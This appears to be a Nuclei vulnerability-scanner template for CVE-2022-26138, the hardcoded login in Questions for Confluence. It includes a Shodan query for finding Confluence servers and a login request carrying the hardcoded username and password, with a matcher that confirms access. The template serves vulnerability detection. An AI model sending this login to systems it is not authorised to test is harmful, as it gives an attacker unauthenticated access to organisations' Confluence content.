id: CVE-2022-26138

info:
  name: Questions For Confluence - Hardcoded Credentials
  author: HTTPVoid
  severity: critical
  description: |
    A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.
  reference:
    - https://twitter.com/fluepke/status/1549892089181257729
    - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26138
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
  classification:
    cve-id: CVE-2022-26138
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve,cve2022,confluence,atlassian,default-login,kev

requests:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action

    attack: pitchfork
    payloads:
      os_username:
        - disabledsystemuser
      os_password:
        - disabled1system1user6708

    matchers:
      - type: dsl
        dsl:
          - 'location == "/httpvoid.action"'